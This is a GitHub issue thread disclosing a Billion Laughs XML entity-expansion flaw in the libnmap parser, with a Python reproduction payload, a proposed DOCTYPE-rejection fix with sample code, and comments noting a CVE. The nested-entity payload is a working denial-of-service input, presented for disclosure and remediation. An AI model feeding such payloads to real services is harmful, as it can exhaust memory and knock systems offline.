
XML Injection DoS attack #87

Open
prodigysml opened this issue Feb 1, 2018 · 2 comments

Comments

@prodigysml

commented Feb 1, 2018

Issue

Libnmap is vulnerable to XML Bomb attacks using the following:
https://en.wikipedia.org/wiki/Billion_laughs_attack

Where the Issue Occurred

The issue occurs within parsing of XML reports for nmap. The exact line where the vulnerable parsing occurs is given below:

```python
root = ET.fromstring(nmap_data)
```

Reproduction steps

Run the following code:

```python
from libnmap.parser import NmapParser

ty = NmapParser()

# Internal DTD: each entity expands to ten copies of the previous one,
# so &lol3; expands to 1000 copies of "lol" (deeper nesting grows exponentially).
payload = """
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz><hello>&lol3;</hello></lolz>
"""

# The parser hands the string straight to ET.fromstring, which expands the entities.
ty.parse(payload)
```

Remediation

Python does not contain any fixes for this vulnerability, but that doesn't mean it can't be fixed. Searching for the word DOCTYPE, prior to parsing, and raising an exception should patch the issue.
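The remediation proposed above, worked through as an added example (this is not libnmap's code and the names `safe_fromstring`, `UnsafeXMLError` and the sample reports are constructed for illustration): any entity declaration, internal or external, has to live inside a DOCTYPE declaration, so refusing a report that contains one blocks entity expansion before the parser ever touches it, and the legitimate nmap output format never carries a DTD.

```python
import re
import xml.etree.ElementTree as ET

# XML is case-sensitive, so only "<!DOCTYPE" is valid; matching case-insensitively
# just makes malformed lowercase variants fail closed as well.
_DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


class UnsafeXMLError(ValueError):
    """Raised when a report contains a DOCTYPE declaration (and so may define entities)."""


def safe_fromstring(nmap_data):
    """Parse nmap XML, refusing any document that declares a DTD.

    Accepts str or bytes, mirroring what ET.fromstring accepts.
    """
    text = (nmap_data.decode("utf-8", errors="replace")
            if isinstance(nmap_data, bytes) else nmap_data)
    if _DOCTYPE_RE.search(text):
        raise UnsafeXMLError("DOCTYPE declaration in nmap XML; refusing to parse")
    return ET.fromstring(nmap_data)


def is_rejected(nmap_data):
    """True if safe_fromstring refuses the input, False if it parses."""
    try:
        safe_fromstring(nmap_data)
    except UnsafeXMLError:
        return True
    return False


# Constructed sample: a minimal, benign nmap report.
SAFE_REPORT = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV 192.0.2.10">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="22"><state state="open"/></port></ports>
  </host>
</nmaprun>
"""

# Constructed sample: the same entity-nesting pattern as the issue, kept to two
# levels (100 expansions) so it is harmless even if it were parsed.
BOMB_REPORT = """<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<nmaprun><host>&lol2;</host></nmaprun>
"""

if __name__ == "__main__":
    print("benign report root:", safe_fromstring(SAFE_REPORT).tag)   # nmaprun
    print("bomb rejected:", is_rejected(BOMB_REPORT))                # True
```

The check is a whole-document gate rather than a parser option because `xml.etree.ElementTree` does not expose expat's DOCTYPE handler; the `defusedxml` package takes the equivalent approach internally and its `defusedxml.ElementTree.fromstring` raises on entity declarations, so it is a drop-in replacement where adding a dependency is acceptable.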

@carnil

commented Jul 15, 2019

This apparently was assigned CVE-2019-1010017.

@cooperlees
Contributor

commented Jul 15, 2019

It seems there has been some work on XML bomb attacks in the past. Maybe it's best to update here and get it fixed?
https://bugs.python.org/issue17239
